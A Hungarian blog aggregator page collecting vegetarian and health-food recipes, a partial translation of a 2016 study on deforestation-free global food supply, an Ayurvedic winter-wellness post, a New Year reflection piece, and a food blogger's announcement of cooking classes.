Az utóbbi időben elhatalmasodtak nálunk a curryk, mármint sokféle curry étel. Nagyon egyszerű az elkészítésük, változatosak, színesek és nagyon finomak. Curryt általában (eddig) valamilyen zöldséggel vagy zöldségekkel és egy fajta hüvelyessel (csicseriborsó, vöröslencse) készítettem, de most kipróbáltam zöldségekkel és tofuval. Fenséges lett. Ez az az étel, amit nem lehet elrontani. Legyünk haladó... Source
Biofizikai lehetőségeink a világ élelmezésére további erdőirtások nélkül
2016 áprilisában publikáltak egy tanulmányt, amely 67 forrásra támaszkodva vezeti le, hogy fenntarthatóság szempontjából melyik étrend az, amelyik a bolygónk maradék erdeinek védelmében a legmegfelelőbb. Az eredeti tanulmány szerzői és angol címe: Karl-Heinz Erb, Christian Lauk, Thomas Kastner, Andreas Mayer, Michaela C. Theurl & Helmut Haberl: Exploring the biophysical option space for feeding the world without deforestation. Nat. Commun. 7:11382 doi: 10.1038/ncomms11382 (2016). LINK az eredeti tanulmányhoz. Fordította: Kertész Tibor A fordítás szakmai lektora: Farkas Richárd (PTE Közgazdaságtudományi kar) A fordítás stilisztikai helyreigazítását végezte: Garai Attila (Biológus, az Orvosi továbbképző szemle szerkesztője) Köszönjük mindannyiótoknak az áldozatos munkát! Kivonat A világ megmaradt erdőinek védelme kiemelt cél. Tanulmányunkban felmérjük a biofizikai lehetőségeket arra vonatkozólag, hogyan élelmezzük az emberiséget 2050-ben további erdők kiirtása nélkül. Szisztematikusan ötvözzük a jövőbeni terméshozamokra, a mezőgazdasági területekre, az állatállomány takarmányozására és az emberi étrendre vonatkozó reális feltételezéseket. Minden egyes forgatókönyv esetében meghatározzuk, hogy a növényi termékek kínálata fedezi-e a keresletet, és hogy a legeltetési intenzitás elfogadható határokon belül marad-e. Megállapítottuk: számos lehetőség létezik arra, hogy 2050-ben erdőirtás nélkül elérhető legyen a megfelelő globális élelmiszer-ellátás, még alacsony terméshozamok mellett is. Az egyes forgatókönyvek nagymértékben különböznek a biomassza-termelés, a termőterület iránti igény és a legeltetési intenzitás tekintetében, elsősorban az emberi étrend mennyiségi és minőségi szempontjaitól függően. A legeltetési korlátok erősen behatárolják az lehetőségeket. Ha nem számolunk emberi beavatkozással a természetes vagy félig természetes állapotú területeken, akkor a kereskedelem volumene növekedni fog azokban a forgatókönyvekben, ahol a táplálkozási módok globálisan egymáshoz konvergálnak, ezáltal csökken számos régió esélye arra, hogy élelmiszerekből önellátó legyen. Előszó A földterületek felhasználása számos, egymással összefüggő kihívással néz szembe a jövőben. A szárazföldi ökoszisztémák kulcsszerepet játszanak a globális éghajlati rendszerben, a globális biológiai sokféleség jelentős részét tartják el, és olyan ökoszisztéma-szolgáltatásokat nyújtanak, amelyek nélkülözhetetlenek az emberiség számára. E szolgáltatásokon az élelmiszereket, a rostanyagokat, az energiát, a víz- és levegőtisztítást, a mikroklíma szabályozását és a természetes veszélyektől való védelmet1 értjük. A Föld szárazföldi, jégmentes felületének háromnegyedét jelenleg az emberiség használja,2,3 és a globális potenciális nettó elsődleges termelés (NPPpot, az ember távollétében is aktív elsődleges termelők, pl. a növények éves nettó szervesanyag-termelése) egynegyedét is az emberiség sajátítja ki.4,5 A földhasználat sok más környezeti hatással is együtt jár, például eutrofizációval, környezetszennyezéssel, a biológiai sokféleség csökkenésével vagy klimatikus hatásokkal. Ezek a negatívumok olyan szinteket érhetnek el, amelyek veszélyeztetik az emberiség által élvezett ökoszisztéma-szolgáltatásokat.6,7. Általában sürgető fenntarthatósági kihívásnak tekintik8 azon módszerek feltárását, amelyek lehetővé teszik a növekvő globális népesség élelmezését és ellátását, miközben megőrzik az ökoszisztémák életet fenntartó funkcióit.1,8 A fennmaradó erdős ökoszisztémák védelme ebben az összefüggésben központi kívánalom. Az erdők több szén-dioxidot tárolnak, mint bármely más felszínborítás típus,9 és a globális biológiai sokféleség jelentős részének adnak otthont.10 Földünk őserdőinek jelentős részét az emberiség már mezőgazdasági területté alakította,2 és ez a folyamat most is zajlik, különösen a trópusi régiókban.11,12 Az olyan nemzetközi tevékenységek, mint az ENSZ együttműködési programja, az erdőirtásból és az erdők leromlásából származó emissziók csökkentésére a fejlődő országokban (Reducing Emissions from Deforestation and Forest Degradation in Developing Countries, REDD) a még meglévő erdei ökoszisztémák védelmét célozzák az éghajlatváltozás mérséklése céljából. Fölvetették, hogy az erdők globális kiterjedése az emberiség számára biztonságos mozgástér indikátora is lehet, és a fenntarthatóság szempontjából kiemelt jelentőségűnek tartják.13 A meglévő erdők megóvása azonban hátráltatja a mezőgazdasági fejlődést, mivel korlátozza a termőföldek és legelőterületek kiterjesztését. Következésképpen a világ egyre növekvő népességének14,15,16 egyre növekvő élelmiszer-, takarmány-, rostanyag- és üzemanyag igényét az egy főre jutó termőterületek csökkenése mellett kell kielégíteni. A legfrissebb tanulmányok azt mutatják, hogy a termőterület bővítése nélkül is lehetséges megfelelő élelmezést biztosítani,17 például a jelenleginél nagyobb terméshozamokkal, 18 ami magasabb mezőgazdasági ráfordításon és nagy volumenű kereskedelmen alapulna.19 Ezzel szemben más tanulmányok azzal érvelnek, hogy az alacsony ráfordítású gazdálkodási rendszerek, mint például az organikus (ökológiai) gazdálkodás, létfontosságúak a jelentős ökoszisztéma-szolgáltatások megóvásában.20,21,22 Hogy az alacsony ráfordítású vagy organikus gazdálkodási rendszerek képesek-e és milyen feltételek mellett képesek élelemmel ellátni a világot, élénken vitatott kérdés,23,24 és további vizsgálatokat igényel.25 A klímaváltozás földhasználat alapú csökkentésének stratégiáit értékelő tanulmányok az emberi étrendek26,27 jövőbeli fejlődését és a globális állatállomány-rendszerek hatékonyságának növelését28,29,30,31 tekintették kulcsfontosságúnak. Azonban az állattenyésztési rendszerek hatékonyságának növekedése nagy takarmányigénnyel jár, ami a termőterületekről származó koncentrált takarmány használatával súlyosbíthatja az élelmezéshez kapcsolódó földhasználati versenyt.8,28,32 Ezzel szemben az élelmiszer-termesztésre közvetlenül nem használható területek és a kérődző állatok fontos lehetőséget kínálnak az élelmezésbiztonság és a megélhetés biztosítására bizonyos körülmények között.33,34,35 A nézőpontok ezen sokszínűsége indokolja az olyan tényezők kölcsönhatásainak szisztematikus feltárását, mint a táplálkozás, a terméshozamok és az állattenyésztés hatékonysága a mezőgazdasági fejlesztésben. Különösen a legeltetés korlátai válnak meghatározóvá hipotetikus, erdőirtás nélküli világunkban. Ebben a helyzetben a termőterületeket kiterjeszthetik a fel nem használt, erdővel nem borított földterületekre - amelyek jellemzően alacsony termőképességűek az éghajlati korlátozó tényezők és az általuk képviselt nagy természeti értékek miatt (átalakításuk is magas ökológiai költséggel jár) -, vagy még inkább más területekre, amelyeket eddig nem műveltek meg, illetve nem részei az infrastruktúrának. Az ilyen területek többsége legelőként használható, változó intenzitással.2,36,37 Ebben a tanulmányban szisztematikusan feltárjuk a mezőgazdasági termelés hipotetikus, erdőirtásmentes határfeltételéből adódó opciókat és korlátokat, és világosan meghatározzuk a legeltetés korlátait. Feltárjuk a kínálatoldali intézkedések (köztük a terméshozamok növelése és a termőterület-bővítés) egyedi szerepét, az állattenyésztési rendszer hatékonyságát érintő intézkedéseket (a takarmányhasznosítási arányok javítását) és a keresletoldali intézkedéseket (mint a mennyiségi és minőségi változások az emberi táplálkozásban). Ezen paraméterek mindegyikére összegyűjtöttük a 2050-re vonatkozó előrejelzéseket, és az adatokat beépítettük egy egységes biomassza-egyensúlyi modellbe (BioBaM), 38,39 hogy megvizsgálhassuk azok kombinált hatásait. Minden egyes forgatókönyv öt paraméter egyedi kombinációjából áll (1. ábra), számszerűsíti a biomassza keresletének és kínálatának viszonyát - a világ, illetve 11 különböző régió számára -, az átlagos legeltetési intenzitással és regionális biofizikai kereskedelmi mérlegekkel együtt. 1 ábra: Kulcs paraméterek és változataik kombinációja a BioBaM-ban, illetve a 2000-es év adatai. (a) A termőföld kibővítési változatok (millió km2), a bővítés nélkülitől (+0%) a nagy hozamú legelők maximális kihasználásáig (+70%). A +11%-os változat összhangban áll a FAO előrejelzéseivel14. (b) a régiós- és fajspecifikus terméshozamok dobozai minden varációra (t sza/ ha/ év - tonna szárazanyag/ hektár/ naptári év), a változatos ökológiai termeléstől a nagy hozamú intenzív monokultúrákig terjedő variációkat mutatják. A színes dobozok jelölik a két belső kvartilitást (>25 és 25 és
Mángoldos - bokkolis subji - indiai zöldséges főétel
2018. február 8. Élj harmóniában
Ezt a subjit gyakran készítem, és képes vagyok több nap egymás után is újra és újra megcsinálni. Imádom ezeknek a zöldségeknek az ízkombinációját és a látványát is:) Hozzávalók 3 ek. ghí ( vegán változatban kókuszzsír) 1 nagy édeskömény 1 nagy fej brokkoli 1 csokor mángold 1 kk. római kömény 1 kk. édeskömény 0,5 ek örölt koriander 1 kis db gyömbér csipet kurkuma só Vegyszermentes (bio) alapanyagokat használj! A brokkolit szedd rózsáira, mosd meg és a rózsákat vág félbe - ha nagyon nagyok 3 vagy 4 részre, emrt így pont együtt készül majd el a többi zöldséggel:). Az édesköményt mosd meg és vágd darabokra. A mangoldot szedd leveleire mosd meg és azt is vágd kisebb darabokra. Én először középen vágom félbe és utána keresztbe. A zsiradékot tedd egy forró edénybe. Tedd bele a római köményt és az édesköményt és pirítsd egy rövid ideig. Add hozzá a gyömbért, koriander és pirítsd őket néhány percig, majd tedd bele a kurkumát. Tedd hozzá a zöldségeket és.tegyél hozzá egy kis vizet, keverd meg és fedd le úgy, hogy egy kis rés maradjon. Néha kevergesd és addig párold, amíg a zöldségek megpuhulnak. Rizzsel, chapati kenyérrel, quinoával vagy bármilyen gabonával tálalhatod. A végén locsold meg olívaolajjal vagy napraforgóolajjal.
Képviselő fánk
2018. február 3. Beautilicious
Krémesnek indult, de cseppet sem bánom, hogy ez lett belőle. Nagyon finom lett! Mindenkinek ajánlom, ha egészségesre és finomra vágyik. Cukor és gluténmentes, ráadásul bűntudatmentes is. hozzávalók - 25gr hajdinaliszt - 75gr barnarizs liszt - 15gr útifűmaghéj - 60gr édesítőszer - 2 tojás - 200ml víz - 1tk sütőpor - 30gr vaj krémhez - 1csomag vaníliás pudingpor - 40gr édesítőszer - 400ml tej habhoz - 100gr sajtkrém - 2tojásfehérje - 2ek édesítőszer így készítsd - A tésztához főzd fel a vizet a cukorral és a vajjal, majd húzd le a tűzről - öntsd bele a liszteket, útifűmaghéjat és a sütőport, és add hozzá a tojásokat is - tedd félre fél órára - sütőpapírra adagolj kis kupacokat kanál segítségével és süsd ki 180 fokon 30 perc alatt - a krémhez főzd fel a pudingport a tejben édesítővel, majd ha kihűlt, keverd hozzá a sajtkrémet - A habhoz gőz felett verd habbá a tojásfehérjét édesítőszerrel, míg fényes nem lesz - Tegyél egy korongra krémet, majd habot, majd még egy korongot a tetejére
édesburgonyás pogácsa
2018. január 27. Beautilicious
Támogasd a szervezeted, és élvezd az ízeket egyszerre! hozzávalók - 300gr lenmagliszt - 400gr édesburgonya - 20gr élesztő - 1 tojás - 100gr tejföl - 100ml tej - méz - só így készítsd - főzd meg az édesburgonyát, majd pépesítsd - futtasd fel mézes tejben az élesztőt - keverd össze a többi hozzávalót - add hozzá az édesburgonyát, majd a felfuttatott élesztőt - dagaszd, majd tedd félre 1 órára kelni - nyújd ki a tésztát, majd szaggasd pogácsákat - süsd ki 180fokon 15perc alatt
Hogyan tartsd Magad melegen a téli időszakban
2018. január 25. Élj harmóniában
Január, február még téli hónapok... ugyan már a napok egyre hosszabbak és eddig kellemes telünk volt, de ettől függetlenül hideg van kint, ezt szinte mindenki érzi. Az időjárásban a Vata minősége dominál - csípős hideg, szél, szárazság. Ilyenkor sokan tapasztalják magunkon a Vata egyensúlytalanságát - hideg kezek, lábak, bőrszárazság, repedezettség az ajkakon, energiahiány, székrekedés, puffadás. álmatlanság, hangulati változások, negatív érzelmek. Amikor fázol, lassul a keringésed, ami a belső szervek munkájának hatékonyságát is csökkenti. Ez további hideg érzetet eredményez a testedbe és kedvezőtlenül hat az izmok, ízületek állapotára. A téli időszakban nem véletlenül sokkal több a derékfájás, térdfájás, etc.. Ahhoz, hogy kiegyensúlyozottan élj fontos figyelembe venned a természet változását és alkalmazkodni a külső környezeti változásokhoz. Célszerű a jógagyakorlásodat, az életmódodat, táplálkozásodat is a téli időszaknak megfelelően alakítani. Jógagyakorlás Télen gyakorolj olyan jógapózokat, amik segítenek a testből elűzni a hideget, serkentik a keringésed, javítják az emésztésed és kedvezően hatnak a légzőszerveidre is - mivel a téli időszakban leginkább a légzőszervi megbetegedések jellemzőek. A hátrahajlító jógapózok, a dinamikus gyakorlás , az álló jógapózok és amikor a kezeket a fejed fölé emeled hőt termelnek, segítik a testedben beindítani az energiaáramlást. A jógagyakorlás előtt mindig alapos bemelegítéssel készítsd elő az izmokat, ízületeket. Amennyiben reggel, nem túl meleg szobában gyakorolsz, kiemelten figyelj erre. Az előkészítő gyakorlatok előmelegítik a tested, felkészítik az izmokat, ízületeket a jógagyakorlásra és könnyebben fog menni a mozgás. Néhány jógapóz, ami segít melegen tartani a tested a Téli időszakban. Az elnevezésekre kattintva el tudod olvasni a póz pontos kivitelezését is. - Napüdvözlet (Surya Namaskara) - serkenti a keringést, hőt termel, átmozgatja az egész test, energetizál - Pálmafapóz (Talászana) - hőt termel, energetizál - Faállás (Vriksászana) - hőt termel, javítja a keringést, erősíti a lábakat, stabilizáló izmokat - Hősi póz 1. (Virabhadra 1.) - hőt termel, erősíti a testet, serkenti a tüdő munkáját - Kobrapóz (Budzsanászana) - melegítő hatású, serkenti az emésztést és nyitja a mellkast, ezáltal a légzőszervek egészségét fokozza, javítja a testtartást - Sáskapóz (Salabászana) - melegítő hatású, serkenti az emésztést és nyitja a mellkast, ezáltal a légzőszervek egészségét fokozza, erősíti az alsú háti szakaszt - Íjállás (Dhanurászana) - melegítő hatású, serkenti az emésztést és nyitja a mellkast, ezáltal a légzőszervek egészségét fokozza - Fél hold állás (Ardha csandrászana) - hőt termel, javítja a keringést, segíti a légzőszervek munkáját - Háromszög állás (Trikonászana) - hőt termel, erősíti a testet,lábakat, stabilizáló izmokat, serkenti a tüdő munkáját, javítja az emésztést Táplálkozás Kerüld el a Vata-t provokáló ételeket pl. hideg ételek, italok, nyers zöldségek, saláták, száraz ételek. Fogyassz meleg, jó minőségű ételeket - az ételek friss, lehetőleg bio alapanyagokból készüljenek. Kerüld az állott, többször melegített ételeket, konzerveket, tartósított élelmiszereket. Részesítsd előnyben a szattvikus táplálékokat.(részletesen erről itt olvashatsz) Egyél sok levest, gabona ételt (pl. rizs, köles, quinoa, hajdina, kukorica) jó minőségű zsírokat (pl. olíva, ghee), fogyassz olajos magvakat (mandula, dió, tökmag, szezámmag) Részesítsd előnyben a szezonalitásnak megfelelő zöldséget (pl. cékla, répa, brokkoli). Használj melegítő és emésztést serkentő fűszereket ( pl. fahéj, gyömbér, asafoetida, fekete bors, kardamom, édeskömény, kurkuma, ) Igyál sok meleg folyadékot. Forralt vizet, fűszeres és gyógyteákat (pl. kiváló melegítő a gyömbér tea). Kerüld el az alkoholt, kávét, teát, cigarettát, és a nagyon csípős ételeket, mert ezek a vata-t kibillentik az egyensúlyukból. Egyél rendszeresen a nap során. ne hagyd ki a reggelit. Reggelire ideálisak a kása félék. pl zabkása.(receptet itt olvashatod) Életmód Télen a természet is visszahúzódik, tedd ezt Te is, fordulj kicsit befelé. Kerüld el a túlpörgést, a megerőltető tevékenységeket. Hagy időt a pihenésre, feltöltődésre a szervezetednek. Próbálj rendszerességet vinni az életedbe, ez is segít a vata. egyensúlyba hozni. Feküdj le korán, aludj eleget, tölts több időt pihenéssel, meditálj és relaxálj rendszeresen. Nagyon jótékonyan hat ilyenkor az olajos masszázs. Nem csak ápolja a bőröd, serkenti a keringést, hőt termel, de hozzájárul a lerakódott salakanyagok eltávolításához is. Az olajos önmasszázsról részletesen itt olvashatsz Sok meleget kívánok:) szeretettel Kati
kókusz tekercs
2018. január 14. Beautilicious
Egy igazán könnyű finomság, amihez még a sütőt se kell bekapcsolnod. Hozzávalók a sötét rétsz: - 75gr mandula - 35gr útifűmag héj - 50gr datolya - 30gr kakaópor - 50ml kávé - 150ml tej a kókuszos töltelék: - 65gr kókuszreszelék - 350gr túró - 50gr édesítőszer Így készítsd - A sötét rész hozzávalóit turmixgépbe tesszük és összeturmixoljuk - Ugyan ezt tesszük a krémmel is - Kinyújtjuk a sötét masszát, majd megtöltjük a kókuszos krémmel - Feltekerjük, majd becsomagoljuk, és hűtőbe tesszük pár órára, végül szeleteljük
Citromos máktorta
2018. január 8. Gitta nyersétel blogja
Ha még nincs eleged a mákból... mákos bejgli, mákos guba, mákos mákos... a mákból sosem elég, igaz? A mák és a citrom barátok :) Hozzávalók egy 10 szeletes tortához: az alaphoz: 10 dkg kókuszreszelék 12 dkg datolyapép (beáztatott datolya elturmixolva) a mákos réteghez: 20 dkg őrölt mák 3 dkg őrölt kesudió 15 dkg datolyapép 1 evőkanál citromlé 1/2 citrom reszelt héja a citromos réteghez: 10 dkg kesudió 1 dl olvasztott kókuszolaj 1 citrom leve és reszelt héja 2 kanál rizsszirup vagy méz 0,4 dl mandulatej (vagy víz) Egy 18 cm-es tortaformát kibélelünk sütőpapírral. Az alap összetevőit jól összegyúrjuk és belenyomkodjuk egyenletesen az alapba. A tetejét kanál hátuljával elsimítjuk. Elkészítjük a mákos réteget: az őrölt mákot, kesudiót összekeverjük a többi hozzávalóval, és rásimítjuk az alapra. A citromos réteghez mindent turmixgépbe teszünk és simára turmixoljuk. Kóstoljuk, az édességét igazítsuk az ízlésünkhöz. Ha kész a krém, azt is a tortára öntjük. Elsimítjuk a tetejét. Hűtőszekrényben hagyjuk összedermedni. Megszórjuk mákkal a tetejét.
pizzás muffin
2017. december 31. Beautilicious
A sok édesség, és karácsonyi terülj-terülj asztalkám után nincs is jobb, mint egy könnyed, és diétás finomság. Bátran falatozhatod, de vigyázz! Vészesen hamar elfogy. hozzávalók - 1 cukkini - 2gerezd fokhagyma - 50gr zabkorpa - 3 tojás - 1tk sütőpor - 150gr reszelt sajt - 150gr paradicsomszósz - só - oregáno - bazsalikom - majoranna így készítsd - A cukkinit reszeld le, majd hagyd állni a sóban - A tojásokat válaszd ketté - Nyomkodd ki a cukkini levét, majd add hozzá a tojássárgáját, és a zabkorpát - A fehérjét verd habbá, majd forgasd a cukkinihez - Adagold a masszát muffinformába, majd süsd 180fokon 15percig - A paradicsompürét keverd ki a fokhagymával, és fűszerekkel, majd kend meg a muffinokat - Reszelj rá sajtot, majd süsd tovább 10percig
narancsos rumos tejszelet
2017. december 29. Beautilicious
A nagy kedvenc egészséges formában is elkészült. Annyira hasonlít az íze a valódi tejszeletéhez, hogy ha becsomagolnám egy olyan csomagolásba, észre se vennéd, hogy nem azt eszed. Ezt az ízt még tovább fokoztam naranccsal és rumaromával..nyamii!!! Hozzávalók - 65gr zaliszt - 20gr kakaópor - 15gr bambuszost liszt - 125gr joghurt - 60+70gr édesítőszer - 4+3 tojás - 250gr mascarpone - 1 narancs héja és leve - rumaroma - 20gr zselatin Így készítsd - Válasz ketté négy tojást - A sárgáját keverd ki joghurttal, és a 60gr édesítőszerrel - Add hozzá a liszteket és a kakaóport - A fehérjét verd kemény habbá, majd forgasd a tésztába - Sütőpapírral bélelt tepsiben süsd ki 180 fokon 20 perc alatt - A krémhez válaszd ketté a 3 tojást, majd a sárgáját keverd ki a mascarponéval, és add hozzá a narancs héját és levét, majd a zselatint is - A fehérjét verd kemény habbá az édesítővel, majd keverd a mascarponéhoz - Ha kisült a tészta, vágjuk ketté, kenjük meg az egyik felét krémmel, majd tegyük rá a másikat
Évértékelés 2017. - Évindítás 2018.
2017. december 27. Élj harmóniában
Lassan közeledik az év vége. Néhány nap és üdvözölheted a 2018-as évet:) Ebben az időszakban sokan elméláznak az elmúlt időszakon és az elmúlt időszak tapasztalataira építve az elkövetkezendő időszakon. Az elmúlt időszak átgondolásánál talán segít, ha szem előtt tartod, hogy bármi is történt Veled, az mindig érted van és a fejlődésedet szolgálja. Még akkor is ha az adott pillanatban úgy tűnik, hogy ez nem lesz a hasznodra és inkább érzed kényelmetlennek, kellemetlennek, mint jótékonynak. Néha az életünk leginkább rémes helyzeteinek, személyeinek köszönhetjük, hogy türelmet, alázatot, egyszerűséget, önzetlenséget, lemondást vagy éppen elengedést tanulhatunk. Nem csak az év vége, hanem minden egyes napod új lehetőségeket, új tapasztalatokat hoz számodra. Járj mindig nyitott szemmel, figyeld mit hoz az élet, figyeld merre mennek a sínek. A nyitottság és az elfogadás, a rugalmasság fogja számodra biztosítani, hogy a következő éved igazán sikeres legyen... Mit jelent, hogy sikeres? Talán azt gondolod, hogy most a szokásos dolgokat fogom ideírni... jó állása van, jó fizetése, autója, elismert, híres, tisztelik, jól csinál ezt vagy azt, tehetséges ebben vagy abban a dologban.... Sikeres az, aki boldog, elégedett önmagában, kiegyensúlyozott, egészséges, tökéletes harmóniában él önmagával és környezetével - a jóga a sikert az önmegvalósítás elérésével definiálja. Ha úgy érzed a mostani életed, a fentiek alapján nem annyira sikeres, akkor tegyél érte, hogy a következő évben, Te is boldog és kiegyensúlyozott legyél. Lásd a változás szükségességét, mert ha ugyanazt csinálod mint eddig, akkor sajnos ugyanazt az eredményt fogod kapni. Gondold át a céljaidat és komolyan kötelezd el magad mellettük. Határozd meg mit szeretnél másképpen a jövőben és tudatosan gondold át, hogyan tudod elérni. Majd szeretettel, türelemmel lépésről, lépésre haladj a megvalósítás útján. Amennyiben úgy érzed, hogy nem vagy elégedett azzal amilyen az életed, akkor biztos, hogy szükséges változtatnod, mert ha ugyanazt csinálod mint eddig, akkor sajnos ugyanazt az eredményt fogod kapni. A változás amit szeretnél érintheti az egészséged, életmódod, személyiséged fejlesztését, gondolkodásod változtatását, emberi kapcsolataidat vagy bármilyen olyan dolgot, amiben szeretnél más eredményt látni a következő évben. Néhány hasznos gondolat ahhoz, hogy át tudd gondolni a 2017-es éved: - Hogyan jellemeznéd ezt az évet röviden? - Mik voltak az év legfontosabb eseményei? - Mik voltak az év legjobb pillanatai, minek örültél idén? - Mi okozott számodra bánatot, rossz érzéseket idén? - Mi jellemezte idén - a testi-lelki egészségedet, közérzetedet? - a párkapcsolatodat? - a családi kapcsolataidat? - a munkahelyi körülményeidet? - a baráti kapcsolataidat? - szabadidődet? - anyagi dolgaidat, pénzügyi helyzetedet? - Kik segítettek terveid alakulásában, kiknek vagy hálás? - Kikkel kötöttél barátságot? - Kikkel tudtál kibékülni, rendezni a kedvezőtlen kapcsolatokat? - Mit tanultál idén, miben sikerült fejlődnöd? - Milyen rossz tulajdonságoktól sikerült megszabadulnod? - Milyen változásokon mentél át amire büszke vagy? - Mit tennél másképpen? - Mi hiányzik az életedből? Í rd össze a dolgaidat, átgondoltan, tudatosan a 2018-as évre vonatkozóan - ne rutinb ó l készíts listát , légy őszinte magadhoz, nézz a szíved mélyére valójában mire vágysz, mit szeretnél. Ha van egy cél amit kitűzöl, akkor képzeld el, milyen érzés lesz ha megvalósul. Ha ez nem jó érzésekkel tölt el, hanem negatív érzetek, szorongás, félelem társul hozzá, akkor jó ha újra átgondolod valóban ez egy célod-e vagy esetleg csak valamilyen elvárásnak, külső nyomásnak szeretnél megfelelni. N e ragaszkodj mindig a megszokott dolgokhoz. Légy nyitott p róbálj ki új dolgokat, tanulj új ismereteket, szerezz új tapasztalatokat. Egy kis segítség ahhoz, hogy a 2018-as éved sikeres legyen : - Mit szeretnél elérni, megvalósítani 2018-ban? - írd össze a céljaidat, terveid - Miben szeretnél fejlődni, mit szeretnél tanulni? - Mik lesznek az év fontosabb eseményei? - Milyennek szeretnéd látni az alábbi életterületeket, miben szeretnél változtatni: - közérzet, egészség - táplálkozás - testmozgás - párkapcsolat - családi kapcsolatok - munkahelyi körülmények - baráti kapcsolatok - szabadidő eltöltése, hobbik, pihenés - anyagi dolgaid, pénzügyi helyzeted - Milyen rossz szokásodtól szeretnél megszabadulni? - Milyen negatív tulajdonságaidon szeretnél változtatni? - Milyen új dolgokat szeretnél kipróbálni idén? - Hová szeretnél eljutni, elutazni ebben az évben? Hasznos az is ha átlapozod a naptárad is és előre betervezed, a főbb eseményeket - családi rendezvények, munkahelyi programok, nyaralás, iskolai események, etc). Ez majd ad egy keretet az évednek. Legyen meg az elképzelésed arról is , mit hogyan szeretnél, de tartsd szem előtt, lehet, hogy neked van egy terved, de az uni verzumnak is van egy terve és a kettő nem mindig egyezik meg egymással. Engedd el a ragaszkodásaidat a jövődet illetően is... ez a világ a változásokról szól . Ha az események nem az elképzeléseid szerint alakulnak, ne akadj fenn, l égy rugalmas, mint a viharban azok a fák, amelyek nem törtnek össze, mert folyamatosan hajlonganak. L égy kész a változásra. Figyeld mindig merre mennek a sínek, és haladj az utadon, ne akarj minden áron egy akadálypályához görcsösen ragaszkodni. A világ nem f og megváltozni körülötted. Ne várd el a világtól, az emberektől, hogy megváltozzanak és minden úgy alakuljon ahogy Te szeretnéd. Bánj a dolgokkal, a személyekkel a természetük szerint. Minden helyzetben Te magad tudsz megváltozni, másképpen gondolkodni, másképpen hozzáállni a dolgokhoz. Higgy benne, hogy a dolgok mindig úgy alakulnak, ahogy azoknak alakulniuk kell . Egy korábbi bejegyzésben erről olvashatsz: Sosem látod a teljes képet... Ha megváltoztatod a gondolataidat, megváltozik az életed. Lásd a dolgok jó részét, légy rugalmas, pozitív, nyitott, türelmes és szeretetteljes. Tudj elégedett lenni, mosolyogj, szeress, fejlődj sokat az új évben :) sok szeretettel kívánok spirituális élményekben gazdag, harmonikus új évet Kati
Indul a Zizi Konyhája!
2017. december 16. Zizi kalandjai
Hát ez a nap is eljött, hogy erről írhatok nektek. Lesznek saját mini főzőtanfolyamaim, a saját, új konyhámban!!! Eljöhettek hozzám(nk) és főzhettek együtt velem és más lelkes jelentkezőkkel.
Fotó: Kállai Márton (Ez még nem saját konyhámban készült fotó!)
Onnan indultam, hogy…
2008 őszén létrehoztam egy blogot… zizikalandjai.blogspot.com néven. Semmi célom nem volt, igazából I. vett rá (mint ahogy rávett a Twitterre és az Instagramra – és milyen jól tette ), hogy csináljak egyet… persze ő találta ki a blog nevét is. Egy posztom árválkodott hónapokig, amit egyedül anyukám nézett meg (már nincs fent a blogon, ne is keressétek ).
2009 nyarán aztán jött Juci barátnőm, aki írt egy utazós blogot és rávett, hogy kezdjek valamit a Zizi kalandjaival. Ráhúztunk egy sablont (ami már nincs meg) és elkezdtem írni mindenféléről, többnyire utazásról és ételről. Július 28-án jelent meg az első receptem, egy vegán lecsós bulgur, noha, akkor még csak vegetáriánus voltam. Berobbant a gasztroblog láz, egyre több magyar és külföldi blogot bújtam és valahogy a cél nélkül elindult Zizi kalandjai elindult egy gasztroblog irányába. Egyre több vegetáriánus, vegán étel receptjét osztottam meg. Vicces látni most a régi bejegyzéseimet, de a fejlődés (fotózás, receptek, írás terén – úgy gondolom megtaláltam a saját “hangomat”, stílusomat – szerintetek is? ) nyomon követhető.
2011 augusztusában egy londoni utazás következett, kiutaztam saját pénzből egy gasztroblogger konferenciára (sajnos nem írtam róla bejegyzést) és megismerkedtem sok–sok külföldi gasztronómiáért rajongó bloggerrel, akik azóta a barátnőim lettek, sikeres szakácskönyv szerzők és utaztunk is egymáshoz. Sokat inspirálódtam, tanultam a konferencián, érdemes volt kiutazni. Aztán barátságot kötöttem itthoni bloggerekkel is, kezdtem megismerkedni a hazai gasztronómiai élettel, és felfedeztem Budapest vega oldalát.
2012-től kitartóan blogoltam, igyekeztem minőségi munkát kiadni a kezemből, megint megújult a blog ruhája. A visszajelzések alapján is átjött az olvasóknak a letisztultság, az átláthatóság. Titokban elkezdtem álmodozni egy saját szakácskönyvről.
2013 tavasza… megszületett első kisfiunk, Ádi, aki a vega gyerek lett. Ebben az évben ősszel kezdtük meg a hozzátáplálást, amelyről néhány bejegyzés is született: első, második, harmadik, negyedik, ötödik. Nem volt nehéz írnom Ádi hozzátáplálásáról, ugyanis nagyon-nagyon jó evő gyerek lett. Már az első falatka répapürét lelkesen ette és azóta is mindig mindent megeszik, amit elé rakunk. Érdekli a főzés, manapság már saját maga szeret alkotni a konyhában. Fejben megalkotja az ételt, én pedig segítek neki elkészíteni.
2014 októberében aztán elindultak a Mit eszik a vegagyerek? sorozatok, amelyekben egyszerűen csak fotókat teszek fel az ételekről, hogy Ádi (és most már Áki is) miket eszik (esznek). Ezzel szeretnék inspirálni mindenkit (főleg anyukákat), hogy viszonylag rövid idő alatt össze lehet dobni változatos, tápanyagokban gazdag, ízletes ebédet vagy vacsorát mindennap a családnak.
2015 őszén több kiadó is megkeresett egy lehetséges szakácskönyv megírása miatt.
2016 év elején megszületett második kisfiunk, Áki. Ezen év elején ültem le először beszélgetni a Boook Kiadóval, akivel nagyon egymásra találtunk. Rövid tervezgetés után megszületett a Vegán Reggeli ötlete, amelyen azonnal elkezdtem dolgozni és az egész nyarat receptek tesztelésével és leírásával töltöttem. Szeptemberben lehullt a lepel és elárultam nektek, hogy hamarosan megjelenik az első vegán Zizi szakácskönyv.
2017 év eleje… még fel sem ocsúdtam a Vegán Reggeli megírásából, már jött az újabb könyv tervezése, receptek tesztelése nagyon rövid idő alatt, éjszakába nyúló laptop püfölés, amikor a recepteket pötyögtem be. Majd tavasszal előrukkoltam a hírrel, hogy hamarosan megjelenik a Mit eszik a vega gyerek? szakácskönyv. Mindkét könyv kedves a szívemnek, a reggelis azért, mert az első, a vega gyerekes azért, mert a gyerekeimhez kötődik.
